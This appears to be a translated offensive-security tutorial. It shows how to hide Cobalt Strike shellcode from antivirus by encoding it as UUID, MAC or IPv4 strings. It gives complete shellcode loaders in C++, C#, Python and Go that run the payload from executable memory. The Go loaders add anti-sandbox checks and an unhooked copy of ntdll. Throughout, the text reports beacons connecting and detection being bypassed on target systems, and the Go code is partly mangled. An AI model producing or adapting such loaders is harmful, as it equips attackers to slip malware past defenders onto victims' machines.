Memory Loading-UUIDAddress-ShellCodeConversion
Introduction: Universal Unique Identification Code (UUID) is a 128-bit identifier used in computer systems to identify the number of information. It is generated according to standard methods and does not rely on registration and distribution by a central agency. UUID is unique.
Demo language: c++
1. Use the following code to convert the C language shellcode to the uuid type
Code: uuid.py
import uuid
import binascii
buf = b"Generated shellcode"
hex = binascii.hexlify(buf).decode()
hex + = '0' * (32 - (len(hex) % 32))
for i in range(0,len(hex),32):
print(""{}",".format(uuid.UUID(bytes_le=binascii.unhexlify(hex[i:i + 32]))))
Run using python:
2. Use a 32-bit loader to execute, and put the uuid type shellcode into the following loader
c++ uuid-shellcode loader code: uuid.cpp
#include <Windows.h>
#include <Rpc.h>
#include <iostream>
#pragma comment(lib, "Rpcrt4.lib")
#pragma comment(linker,"/subsystem:"Windows" /entry:"mainCRTStartup"")
const char* uuids[] =
{
shellcode of uuid
};
int main()
{
HANDLE hc = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0);
void* ha = HeapAlloc(hc, 0, 0x100000);
DWORD_PTR hptr = (DWORD_PTR)ha;
int elems = sizeof(uuids) / sizeof(uuids[0]);
for (int i = 0; i < elems; i + + ) {
RPC_STATUS status = UuidFromStringA((RPC_CSTR)uuids[i], (UUID*)hptr);
if (status != RPC_S_OK) {
CloseHandle(ha);
return -1;
}
hptr + = 16;
}
EnumSystemLocalesA((LOCALE_ENUMPROCA)ha, 0);
CloseHandle(ha);
return 0;
}
Execute the code and cs goes online successfully
3. Generate an exe execution program, upload it to the target system, and be killed by Tinder.
This shellcode conversion method for uuid can also be used to avoid killing using shellcode loaders in C#, Python2, Go and other languages.
Demo language: c#
4. Use the c# language loader to generate the exe program.
c# uuid-shellcode loader code: uuid.cs
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Runtime.InteropServices;
using DInvoke;
namespace UuidShellcode
{
class Program
{
[DllImport("kernel32.dll", SetLastError = true)]
static extern IntPtr HeapCreate(uint flOptions, UIntPtr dwInitialSize,UIntPtr dwMaximumSize);
[DllImport("kernel32.dll", SetLastError = false)]static extern IntPtr HeapAlloc(IntPtr hHeap, uint dwFlags, uint dwBytes);
static void Main(string[] args)
{
var HeapCreateHandle = HeapCreate((uint)0x00040000, UIntPtr.Zero, UIntPtr.Zero);
var heapAddr = HeapAlloc(HeapCreateHandle, (uint)0, (uint)0x100000);
string[] uuids =
{
Uuid shellcode
};
IntPtr pkernel32 = DInvoke.DynamicInvoke.Generic.GetPebLdrModuleEntry("kernel32.dll");
IntPtr prpcrt4 = DInvoke.DynamicInvoke.Generic.GetPebLdrModuleEntry("rpcrt4.dll");
IntPtr pEnumSystemLocalesA = DInvoke.DynamicInvoke.Generic.GetExportAddress(pkernel32, "EnumSystemLocalesA");
IntPtr pUuidFromStringA = DInvoke.DynamicInvoke.Generic.GetExportAddress(prpcrt4, "UuidFromStringA");
IntPtr newHeapAddr = IntPtr.Zero;
for (int i = 0; i < uuids.Length; i + + )
{
newHeapAddr = IntPtr.Add(HeapCreateHandle, 16 * i);
object[] uuidFromStringAParam = { uuids[i], newHeapAddr };
var status = (IntPtr)DInvoke.DynamicInvoke.Generic.DynamicFunctionInvoke(pUuidFromStringA, typeof(DELEGATE.UuidFromStringA), ref uuidFromStringAParam);
}
object[] enumSystemLocalesAParam = { HeapCreateHandle, 0 };
var result = DInvoke.DynamicInvoke.Generic.DynamicFunctionInvoke(pEnumSystemLocalesA, typeof(DELEGATE.EnumSystemLocalesA), ref enumSystemLocalesAParam);
}
}
public class DELEGATE
{
[UnmanagedFunctionPointer(CallingConvention.StdCall)]
public delegate IntPtr UuidFromStringA(string StringUuid, IntPtr heapPointer);
[UnmanagedFunctionPointer(CallingConvention.StdCall)]
public delegate bool EnumSystemLocalesA(IntPtr lpLocaleEnumProc, int dwFlags);
}
}
5. Upload the exe to the target system and successfully bypass the tinder detection
Memory Loading-MACAddress-ShellCodeConversion
Introduction: MAC address is also called physical address and hardware address. It is a flash memory chip burned into the EPROM of the network card when produced by the network equipment manufacturer. It can usually be erased by a program. IP addresses and MAC addresses are both represented in binary in computers. IP addresses are 32 bits, while MAC addresses are 48 bits (6 bytes).
Loader using python language
1. Use the following code to convert the c language shellcode to mac type
Code: mac.py
import ctypes
shellcode = b"generated shellcode"
macmem = ctypes.windll.kernel32.VirtualAlloc(0,len(shellcode)/6*17,0x3000,0x40)
for i in range(len(shellcode)/6):
bytes_a = shellcode[i*6:6 + i*6]
ctypes.windll.Ntdll.RtlEthernetAddressToStringA(bytes_a, macmem + i*17)
a = ctypes.string_at(macmem, len(shellcode) * 3 - 1)
print(a)
list = []
for i in range(len(shellcode)/6):
d = ctypes.string_at(macmem + i*17,17)
list.append(d)
print(list)
Execute using python2:
2. Put the generated mac type shellcode into the loader.
python language mac type shellcode loader code: mac-zx.py
import ctypes
list=[mac type shellcode]
ptr = ctypes.windll.kernel32.VirtualAlloc(0,len(list)*6,0x3000,0x04)
rwxpage = ptr
for i in range(len(list)):
ctypes.windll.Ntdll.RtlEthernetStringToAddressA(list[i], list[i], rwxpage)
rwxpage + = 6
ctypes.windll.kernel32.VirtualProtect(ptr, len(list)*6, 0x40, ctypes.byref(ctypes.c_long(1)))
handle = ctypes.windll.kernel32.CreateThread(0, 0, ptr, 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)
Use python2 to execute, and cs is successfully online.
3. Execute the command and use pyinstaller to package mac-zx.py into an exe execution program.
Installation: python install pyinstall
Note: If the installation of python2 is unsuccessful, you can use python3 to install it, and then copy the pyinstall.exe program to python2 in the sciripts directory.
Packaging command: pyinstaller.exe -F -w mac-zx.py
The packaging is executed successfully and the exe is saved in the dist directory.
4. Upload the exe program to the target system and successfully bypass the tinder detection.
Loader using go language
1. Use the following code to convert the c language shellcode to mac type
Code: mac.py Use whatever digits of shellcode the installed go has.
import ctypes
#Input your shellcode like:\xfc\x48\x83\xe4\xf0\xe8\xxx
shellcode = b'generated shellcode'
mac = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode)/6*17, 0x3000, 0x40)
for i in range(len(shellcode)/6):
bytes_shellcode = shellcode[i*6:6 + i*6]
ctypes.windll.Ntdll.RtlEthernetAddressToStringA(bytes_shellcode, mac + i*17)
a = ctypes.string_at(mac, len(shellcode)*3-1)
#print(a)
l = []
for i in range(len(shellcode)/6):
d = ctypes.string_at(mac + i*17, 17)
l.append(d)
mac_shellcode = str(l).replace("'", """).replace(" ", "").replace("\r\\
\ ","")
with open("mac_shell.txt", "w + ") as f:
f.write(mac_shellcode)
Use python to execute: Generate a mac_shell.txt file in the root directory to save the mac type shellcode
2. Put the converted mac type shellcode into the following loader
Go language mac-shelcode loader code: This loader has anti-virtual machine code to prevent anti-software debugging
go-mac.go:
/*
Author:Crispr
*/
packagemain
import(
"fmt"
"io/ioutil"
"log"
"os"
"runtime"
"syscall"
"time"
"unsafe"
"github.com/Binject/universal"
"golang.org/x/sys/windows"
)
var(
kernel32=windows.NewLazySystemDLL("kernel32")
Activeds=windows.NewLazySystemDLL("Activeds.dll")
HeapCreate=kernel32.NewProc("HeapCreate")
HeapAlloc=kernel32.NewProc("HeapAlloc")
AllocADsMem=Activeds.NewProc("AllocADsMem")
VirtualProtectEx=kernel32.NewProc("VirtualProtectEx")
EnumSystemLocalesW=kernel32.NewProc("EnumSystemLocalesW")
)
const(
//Configure heap properties
MEM_COMMIT=0x1000
MEM_RESERVE=0x2000
PAGE_EXECUTE_READWRITE=0x40//The area can execute code and the application can read and write this area.
HEAP_CREATE_ENABLE_EXECUTE=0x00040000
)
//Fill in the characters converted from shellcode to MAC here, such as "FC-48-83-E4-F0-E8","C8-00-00-00-41-51"
varshell_mac[]string=[]string{mac type shellcode}
funcnumverofCPU()(int,error){
num_of_cpu:=runtime.NumCPU()
ifnum_of_cpu<4{
return0,nil
}else{
return1,nil
}
}
functimeSleep()(int,error){
startTime:=time.Now()
time.Sleep(10*time.Second)
endTime:=time.Now()
sleepTime:=endTime.Sub(startTime)
ifsleepTime>=time.Duration(10*time.Second){
return1,nil
}else{
return0,nil
}
}
funcphysicalMemory()(int,error){
varmod=syscall.NewLazyDLL("kernel32.dll")
varproc=mod.NewProc("GetPhysicallyInstalledSystemMemory")
varmemuint64
proc.Call(uintptr(unsafe.Pointer( & amp;mem)))
mem=mem/1048576
ifmem<4{
return0,nil
}
return1,nil
}
funcmain(){
//Customize sleep time
//timeSleep()
varntdll_image[]byte
varerrerror
num,_:=numverofCPU()
mem,_:=physicalMemory()
ifnum==0||mem==0{
fmt.Printf("HelloCrispr")
os.Exit(1)
}
ntdll_image,err=ioutil.ReadFile("C:\Windows\System32\\
tdll.dll")
/*
heapAddr,_,err:=HeapCreate.Call(uintptr(HEAP_CREATE_ENABLE_EXECUTE),0,0)
ifheapAddr==0{
log.Fatal(fmt.Sprintf("therewasanerrorcallingtheHeapCreatefunction:\r\\
%s",err))
}
*/
ntdll_loader,err:=universal.NewLoader()
iferr!=nil{
log.Fatal(err)
}
ntdll_library,err:=ntdll_loader.LoadLibrary("main", & amp;ntdll_image)
iferr!=nil{
log.Fatal(fmt.Sprintf("therewasanerrorcallingtheLoadLibraryfunction:\r\\
%s",err))
}
/*
addr,_,err:=HeapAlloc.Call(heapAddr,0,uintptr(len(shell_mac)*6))
*/
addr,_,err:=AllocADsMem.Call(uintptr(len(shell_mac)*6))
ifaddr==0||err.Error()!="Theoperationcompletedsuccessfully."{
log.Fatal(fmt.Sprintf("therewasanerrorcallingtheHeapAllocfunction:\r\\
%s",err))
}
addrptr:=addr
for_,mac:=rangeshell_mac{
u:=append([]byte(mac),0)
_,err=ntdll_library.Call("RtlEthernetStringToAddressA",uintptr(unsafe.Pointer( & amp;u[0])),uintptr(unsafe.Pointer( & amp;u[0])),addrptr)
iferr!=nil & amp; & amp;err.Error()!="Theoperationcompletedsuccessfully."{
log.Fatal(fmt.Sprintf("therewasanerrorcallingtheHeapAllocfunction:\r\\
%s",err))
}
addrptr + =6
}
oldProtect:=windows.PAGE_READWRITE
VirtualProtectEx.Call(uintptr(windows.CurrentProcess()),addr,uintptr(len(shell_mac)*6),windows.PAGE_EXECUTE_READWRITE,uintptr(unsafe.Pointer( & amp;oldProtect)))
EnumSystemLocalesW.Call(addr,0)
}
Note: If a timeout error occurs during go get, execute: go env -w GOPROXY=https://goproxy.cn
3. Execute the loader and cs is successfully online
4. Execute the command and generate the exe program
Command: go build loader name
5.exe is uploaded to the target directory and directly manipulated by Tinder. Tinder: Just………………………and sit down for me!
Memory loading-IPV4 mode-ShellCode conversion
Introduction: IPv4 is a connectionless protocol that operates on the link layer (such as Ethernet) using packet switching. This protocol delivers packets on a best-effort basis, meaning that it does not guarantee that any packet will reach its destination or that all packets will arrive in the correct order without duplication. IPv4 uses 32-bit (4-byte) addresses.
Use go language loader
1. Use the following code to convert the c language shellcode generated by cs into ipv4 type shellcode
ipv4.py:
# coding = utf-8
import ctypes
#Input your shellcode like:\xfc\x48\x83\xe4\xf0\xe8\xxx
shellcode = b'shellcode generated by cs'
ipv4 = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode)/4*15, 0x3000, 0x40)
for i in range(len(shellcode)/4):
bytes_shellcode = shellcode[i*4:i*4 + 4]
ctypes.windll.Ntdll.RtlIpv4AddressToStringA(bytes_shellcode, ipv4 + i*15)
a = ctypes.string_at(ipv4, len(shellcode)*4-1)
l = []
for i in range(len(shellcode)/4):
d = ctypes.string_at(ipv4 + i*15, 15)
l.append(d)
ipv4_shellcode = str(l).replace("'", """).replace(" ", "").replace("\r\\
\ ","")
with open("ipv4_shell.txt", "w + ") as f:
f.write(ipv4_shellcode)
Execute using python: The generated shellcode is saved in the ipv4_shell.txt file
2. Put the ipv4 type shellcode into the following loader.
Go language ipv4-shellcode loader code:
go-ipv4.go:
/*
Author:Crispr
*/
packagemain
import(
"fmt"
"io/ioutil"
"log"
"os"
"runtime"
"syscall"
"time"
"unsafe"
"github.com/Binject/universal"
"golang.org/x/sys/windows"
)
var(
kernel32=windows.NewLazySystemDLL("kernel32")
Activeds=windows.NewLazySystemDLL("Activeds.dll")
HeapCreate=kernel32.NewProc("HeapCreate")
HeapAlloc=kernel32.NewProc("HeapAlloc")
AllocADsMem=Activeds.NewProc("AllocADsMem")
VirtualProtectEx=kernel32.NewProc("VirtualProtectEx")
EnumSystemLocalesW=kernel32.NewProc("EnumSystemLocalesW")
)
const(
//Configure heap properties
MEM_COMMIT=0x1000
MEM_RESERVE=0x2000
PAGE_EXECUTE_READWRITE=0x40//The area can execute code and the application can read and write this area.
HEAP_CREATE_ENABLE_EXECUTE=0x00040000
)
//Put the converted shellcode here, such as 252.72.131.228\x00","240.232.200.0\x00\x00"
varshell_ipv4[]string=[]string{"ipv4 type shellcode"}
functimeSleep()(int,error){
startTime:=time.Now()
time.Sleep(10*time.Second)
endTime:=time.Now()
sleepTime:=endTime.Sub(startTime)
ifsleepTime>=time.Duration(10*time.Second){
return1,nil
}else{
return0,nil
}
}
funcnumverofCPU()(int,error){
num_of_cpu:=runtime.NumCPU()
ifnum_of_cpu<4{
return0,nil
}else{
return1,nil
}
}
funcphysicalMemory()(int,error){
varmod=syscall.NewLazyDLL("kernel32.dll")
varproc=mod.NewProc("GetPhysicallyInstalledSystemMemory")
varmemuint64
proc.Call(uintptr(unsafe.Pointer( & amp;mem)))
mem=mem/1048576
ifmem<4{
return0,nil
}
return1,nil
}
funcmain(){
//Customize sleep time
//timeSleep()
varntdll_image[]byte
varerrerror
num,_:=numverofCPU()
mem,_:=physicalMemory()
ifnum==0||mem==0{
fmt.Printf("HelloCrispr")
os.Exit(1)
}
ntdll_image,err=ioutil.ReadFile("C:\Windows\System32\\
tdll.dll")
/*
heapAddr,_,err:=HeapCreate.Call(uintptr(HEAP_CREATE_ENABLE_EXECUTE),0,0)
ifheapAddr==0{
log.Fatal(fmt.Sprintf("therewasanerrorcallingtheHeapCreatefunction:\r\\
%s",err))
}
*/
ntdll_loader,err:=universal.NewLoader()
iferr!=nil{
log.Fatal(err)
}
ntdll_library,err:=ntdll_loader.LoadLibrary("main", & amp;ntdll_image)
iferr!=nil{
log.Fatal(fmt.Sprintf("therewasanerrorcallingtheLoadLibraryfunction:\r\\
%s",err))
}
/*
addr,_,err:=HeapAlloc.Call(heapAddr,0,uintptr(len(shell_mac)*6))
*/
addr,_,err:=AllocADsMem.Call(uintptr(len(shell_ipv4)*4))
ifaddr==0||err.Error()!="Theoperationcompletedsuccessfully."{
log.Fatal(fmt.Sprintf("therewasanerrorcallingtheHeapAllocfunction:\r\\
%s",err))
}
addrptr:=addr
for_,ipv4:=rangeshell_ipv4{
u:=append([]byte(ipv4),0)
_,err=ntdll_library.Call("RtlIpv4StringToAddressA",uintptr(unsafe.Pointer( & amp;u[0])),uintptr(0),uintptr(unsafe.Pointer( & amp;u[0])) ,addrptr)
iferr!=nil & amp; & amp;err.Error()!="Theoperationcompletedsuccessfully."{
log.Fatal(fmt.Sprintf("therewasanerrorcallingtheHeapAllocfunction:\r\\
%s",err))
}
addrptr + =4
}
oldProtect:=windows.PAGE_READWRITE
VirtualProtectEx.Call(uintptr(windows.CurrentProcess()),addr,uintptr(len(shell_ipv4)*4),windows.PAGE_EXECUTE_READWRITE,uintptr(unsafe.Pointer( & amp;oldProtect)))
EnumSystemLocalesW.Call(addr,0)
}
3. Execute the loader and cs is successfully online
4. Execute the command and generate the exe program
Command: go build loader name
5. Upload the exe to the target directory and be killed
Extra:
On the basis of converting shellcode into UUID, MAC, IPV4 and other types, it can also be used with: encoding, encryption, separation, garbage data and other anti-virus methods to prompt anti-virus effects.
The knowledge points of the article match the official knowledge files, and you can further learn related knowledge. Network Skill TreeHomepageOverview 39825 people are learning the system